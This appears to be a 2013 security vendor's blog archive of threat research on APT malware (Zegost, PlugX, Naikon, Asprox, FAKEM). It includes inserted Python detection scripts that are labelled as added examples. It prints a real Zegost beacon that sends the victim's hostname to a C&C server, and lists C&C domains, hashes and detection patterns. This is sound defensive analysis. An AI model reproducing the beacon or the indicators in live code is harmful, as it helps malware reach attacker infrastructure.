    TrendLabs Security Intelligence Blog

    Author Archive - Nart Villeneuve (Senior Threat Researcher)




    Additional text and analysis by Kyle Wilhoit

    Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

    Zegost

    One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.


    Figure 1. Sample decoy document

    The PDFs contain embedded JavaScript code that is similar to the code used by the MiniDuke campaign, down to matching function and variable names.


    Figure 2. Similar JavaScript code

    Analyzing the PDFs with Didier Stevens’ PDFiD tool shows that the two files are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/JavaScript”, “/OpenAction”, and “/Page”: they indicate, respectively, that JavaScript is embedded, that an action runs automatically when the document is opened, and how many page objects the file contains. These three items helped us identify the similarities between MiniDuke and Zegost.

    The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

    However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks; it has no connection with the MiniDuke malware payload. The Zegost malware has a distinct beacon:

    GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: dns.yimg.ca
    Cache-Control: no-cache

    The command-and-control server, dns.yimg.ca, resolves to 223.26.55.122, an address that has also been used by the better-known command-and-control servers imm.conimes.com and iyy.conimes.com. The email address used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also malicious.
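    The beacon above is specific enough to detect on a web proxy. The following Python script is an added example (not code from the post or from Trend Micro): it matches each request against the indicators the post lists, the online.asp check-in with its hostname/httptype parameters, the MSIE 6.0 User-Agent, and the C&C domains and IP. The tab-separated log format and the client addresses are constructed for the example; only the first line reproduces the beacon shown above. The User-Agent alone is graded low because it is a stock Internet Explorer 6 string that legitimate clients of that era also sent.

```python
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the post: the beacon path, the User-Agent it sends, and the
# C&C domains and IP tied to the same registrant.
BEACON_PATH = "/cgi/online.asp"
ZEGOST_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"
C2_DOMAINS = {"dns.yimg.ca", "imm.conimes.com", "iyy.conimes.com",
              "scvhosts.com", "updata-microsoft.com"}
C2_IPS = {"223.26.55.122"}

# Constructed sample proxy log (tab-separated: timestamp, client, server IP, method,
# Host header, request URI, User-Agent). Hostnames and internal IPs are invented;
# only the first line reproduces the beacon format shown in the post.
SAMPLE_LOG = (
    "2013-07-01T10:00:01Z\t10.0.0.5\t223.26.55.122\tGET\tdns.yimg.ca\t"
    "/cgi/online.asp?hostname=WS-FIN-07&httptype=[1][not%20httptunnel]\t"
    "Mozilla/4.0 (compatible; MSIE 6.0; Win32)\n"
    "2013-07-01T10:00:03Z\t10.0.0.6\t93.184.216.34\tGET\twww.example.com\t"
    "/index.html\tMozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0\n"
    "2013-07-01T10:00:09Z\t10.0.0.7\t198.51.100.20\tGET\tintranet.example.com\t"
    "/cgi/online.asp?user=bob\tMozilla/4.0 (compatible; MSIE 6.0; Win32)\n"
)


def classify_request(method, uri, host, server_ip, user_agent):
    """Return the Zegost indicators a single HTTP request matches (empty if none)."""
    hits = []
    parts = urlsplit(uri)
    query = parse_qs(parts.query, keep_blank_values=True)
    if (method == "GET" and parts.path == BEACON_PATH
            and {"hostname", "httptype"}.issubset(query)):
        hits.append("beacon-uri")            # check-in URI carrying both parameters
        if any("httptunnel" in v.lower() for v in query["httptype"]):
            hits.append("httptype-marker")   # the literal '[not httptunnel]' tag
    if user_agent == ZEGOST_UA:
        hits.append("user-agent")            # weak on its own: a stock MSIE 6 string
    if host.lower() in C2_DOMAINS:
        hits.append("c2-domain")
    if server_ip in C2_IPS:
        hits.append("c2-ip")
    return hits


def scan_log(text):
    """Run every log line through classify_request and grade what matched."""
    strong = {"beacon-uri", "c2-domain", "c2-ip"}
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, server_ip, method, host, uri, ua = line.split("\t")
        hits = classify_request(method, uri, host, server_ip, ua)
        if not hits:
            continue
        severity = "high" if strong & set(hits) else "low"
        alerts.append({"ts": ts, "client": client, "severity": severity, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"], alert["ts"], alert["client"], ", ".join(alert["hits"]))
```

    Running the script alerts on the first line with high severity (every indicator matches) and on the third line with low severity (User-Agent only); the ordinary browser request produces nothing. The path check deliberately requires both query parameters so that an unrelated internal CGI script named online.asp does not trigger the strong rule.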

    PlugX

    The second set of malicious PDFs are not necessarily directly related to one another, although they all drop PlugX variants (different ones in each case). The attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

    However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. Comparing the PDFiD output for the three files makes the differences visible, starting with the PDF version used:

    Field            Zegost      MiniDuke    PlugX
    PDF Header       %PDF-1.4    %PDF-1.4    %PDF-1.7
    obj              8           8           43
    endobj           8           8           44
    stream           3           1           10
    endstream        3           2           11
    xref             1           1           4
    trailer          1           1           4
    startxref        1           1           4
    /Page            1           1           6
    /Encrypt         0           1           0
    /ObjStm          0           0           0
    /JavaScript      1           1           1
    /AA              0           0           0
    /OpenAction      1           1           1
    /AcroForm        1           1           1
    /JBIG2Decode     0           0           0
    /RichMedia       0           0           0
    /Launch          0           0           0
    /EmbeddedFile    0           0           0
    /XFA             1           1           1
    /Colors > 2^24   0           0           0
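    The PDFiD tallies compared above and in the Zegost section are simple keyword counts, which makes the check easy to reproduce and to run at scale. The following Python script is an added example, not code from the post and not PDFiD itself: it counts the same keywords on a small PDF constructed for the example (not one of the samples from the post) and turns the counts into the observations the post draws from them, that JavaScript is embedded and that /OpenAction makes it run as soon as the document opens. The constructed sample writes the keyword as /J#61vaScript, a legal PDF hex escape that hides it from a naive grep, so the counter resolves such escapes first. Like PDFiD, it does not inflate compressed streams, so keywords stored inside /FlateDecode data remain unseen; that limitation is noted in a comment.

```python
import re

# The keywords PDFiD tallies; the post singles out /JavaScript, /OpenAction and /Page.
KEYWORDS = [
    "obj", "endobj", "stream", "endstream", "xref", "trailer", "startxref",
    "/Page", "/Encrypt", "/ObjStm", "/JavaScript", "/AA", "/OpenAction",
    "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA",
]

# Constructed sample (not one of the PDFs from the post): a one-page file whose
# catalog opens a JavaScript action automatically. The name is written as
# /J#61vaScript, a legal hex escape that hides the keyword from a plain grep.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AcroForm << /XFA 5 0 R >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj
5 0 obj << /Length 0 >> stream
endstream endobj
xref
0 6
trailer << /Root 1 0 R /Size 6 >>
startxref
0
%%EOF
"""


def _unescape_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes in name objects so /J#61vaScript counts as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """PDFiD-style tally of structural keywords. Like PDFiD, this does not inflate
    compressed streams, so keywords hidden inside /FlateDecode data stay unseen."""
    data = _unescape_names(data)
    counts = {}
    for kw in KEYWORDS:
        if kw.startswith("/"):
            # A name ends at whitespace or a delimiter, so /Page must not match /Pages.
            pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9])"
        else:
            # Bare tokens must stand alone: 'obj' must not count the 'obj' inside 'endobj'.
            pattern = rb"(?<![A-Za-z])" + re.escape(kw.encode()) + rb"(?![A-Za-z])"
        counts[kw] = len(re.findall(pattern, data))
    header = re.match(rb"%PDF-\d\.\d", data)
    counts["PDF Header"] = header.group(0).decode() if header else ""
    return counts


def triage(counts: dict) -> list:
    """Turn the raw tally into the observations the post draws from it."""
    findings = []
    auto = counts["/OpenAction"] or counts["/AA"]
    if counts["/JavaScript"]:
        findings.append("embedded JavaScript")
    if auto:
        findings.append("automatic action on open")
    if counts["/JavaScript"] and auto:
        findings.append("JavaScript runs without user interaction")
    if counts["/AcroForm"] or counts["/XFA"]:
        findings.append("form content (AcroForm/XFA)")
    if counts["/JavaScript"] and counts["/Page"] <= 1:
        findings.append("single-page document carrying script")
    return findings


if __name__ == "__main__":
    tally = count_keywords(SAMPLE_PDF)
    for name in ["PDF Header"] + KEYWORDS:
        print(f"{name:<16}{tally[name]}")
    print("findings:", ", ".join(triage(tally)))
```

    On the constructed sample the tally reads /JavaScript 1, /OpenAction 1, /Page 1, /AcroForm 1 and /XFA 1, the same pattern the Zegost and MiniDuke columns show above, and triage reports that the script runs without user interaction. Because the counter never decompresses streams, a file whose counts all read 0 but whose /ObjStm or stream count is high still deserves a second look with a tool that inflates object streams.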

    Posted in Malware, Targeted Attacks



    Using encrypted communication such as Secure Sockets Layer (SSL), combined with the clever use of a recent news item as a social engineering lure, is the perfect combination for penetrating and remaining inside a targeted entity’s infrastructure.

    It didn’t take long for targeted attacks to use last week’s Boston Marathon bombing as bait to trick pre-selected users into opening malicious attachments. We found an email with a malicious attachment named The Prayer.DOC, urging recipients to pray for the victims of the tragic event.


    Figure 1. Sample email leveraging Boston Marathon incident

    The attachment (MD5: 5863fb691dd5b3002c040fc7c535800f, detected as TROJ_MDROP.ATP) exploits CVE-2012-0158 to drop the malicious executable “iExplorer.exe” (MD5: 74a8269dd80d41f7c81e0323719c883c) onto the target’s computer.

    This malware, detected as TROJ_NAIKON.A, connects over SSL (port 443) to the domain name gnorthpoint.eicp.net which previously resolved to 220.165.218.39 but now resolves to 50.117.115.89.

    The certificate is filled with spoofed information including the identity “donc” and the organization “abc”.


    Figure 2. Screenshot of certificate with spoofed info

    Posted in Targeted Attacks


    Mar 4, 7:12 am (UTC-7)

    While spam botnets are well-known for sending out unwanted ads, especially for “rogue” pharmaceutical companies, they are also an integral component of malware distribution. In addition to sending out their own malware so that they can increase the size of their botnet, the miscreants behind these operations also earn revenue by installing additional malware supplied by Pay-Per-Install (PPI) affiliates, or “partnerkas”.

    We have examined the operations of the infamous Asprox spam botnet in some detail. Asprox is known for sending spam pretending to be from package delivery companies like FedEx, DHL, and the US Postal Service. While Asprox has only been mentioned sporadically in the past few years, other spam campaigns with similar tactics as well as fake ticket scams using well-known airlines like Delta and American Airlines have received significant attention.

    Relatively few of these campaigns were connected to Asprox, and even fewer reports offered insight into the full botnet’s operations. How was this possible? Several modifications made Asprox much more effective:

    • It uses a diverse set of spam templates spanning a variety of themes and languages to lure users into opening malicious attachments or clicking malicious links.
    • It adopted a modular framework (with KULUOZ malware as a dropper) so botnet operators could easily add new features when needed. RC4 encryption was also added to combat network-level detection.
    • It has multiple spamming modules, one of which uses compromised legitimate email accounts to combat anti-spam technologies that utilize reputation systems.
    • It deploys a scanning module that commands compromised computers to scan websites for various vulnerabilities. This is done so it can distribute malware via compromised websites without being caught by web-filtering and reputation technologies.
    • It distributes an information-stealing module that allows it to harvest FTP, website, and email credentials from its victims.

    Posted in Botnets, Malware, Spam



    The perpetrators of targeted attacks want to maintain a persistent presence in a target network in order to extract sensitive data when needed. To maintain this, attackers seek to blend in with normal network traffic and use ports allowed by firewalls.

    Frequently, the malware used in targeted attacks uses HTTP and HTTPS to appear like ordinary web traffic. However, while these malware tools do give attackers full control over a compromised system, they are often simple and configured to carry out few commands.

    Some attackers prefer to use remote access Trojans (RATs), sometimes as “second stage” malware. These typically have graphical user interfaces (GUIs) and remote desktop features that include directory browsing, file transfer, the ability to take screenshots, and activating the microphone and web camera of a compromised computer. Publicly available RATs like Gh0st, PoisonIvy, Hupigon, and DRAT, as well as “closed-released” RATs like MFC Hunter and PlugX, are in common use. However, the network traffic these RATs produce is well-known and easily detectable, although attackers still successfully use them.

    To get around this, attackers are always looking for ways to blend their malicious traffic with legitimate traffic to avoid detection. We found a family of RATs that we call “FAKEM” that makes their network traffic look like various protocols. Some variants attempt to disguise network traffic to look like Windows® Messenger and Yahoo!® Messenger traffic. Another variant tries to make the content of its traffic look like ordinary web traffic. The FAKEM RAT appears to have been actively used in attacks since September 2009.




    Now that knowledge of targeted attacks, including APT activity, has become mainstream within the broader security community, I predict that 2013 will be a year in which our assumptions will be challenged. We have already seen how successful so-called “technically unsophisticated” attacks have been over the last few years, and I predict they will continue to be so, as they are designed to exploit the human factor as much as, if not more than, technology.

    In his 2013 predictions, our CTO Raimund Genes predicts that there will be increasing sophistication in malware attacks, not necessarily in the technical aspects of the malware itself but in the deployment of an attack. Moreover, he believes that such attacks will increasingly have a destructive capacity and that it will be challenging to determine attribution. Building on these points, I predict the following trends for 2013:

    • There will be an increasing specificity in targeted attacks, especially as knowledge of some of the noisier APT campaigns is increasingly publicized. We will see an increase in localized attacks such as malware that will not execute unless certain conditions are met, such as language settings, or “watering hole” attacks that will only affect certain geographic regions or even only specific netblocks.
    Posted in Data, Malware, Targeted Attacks


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice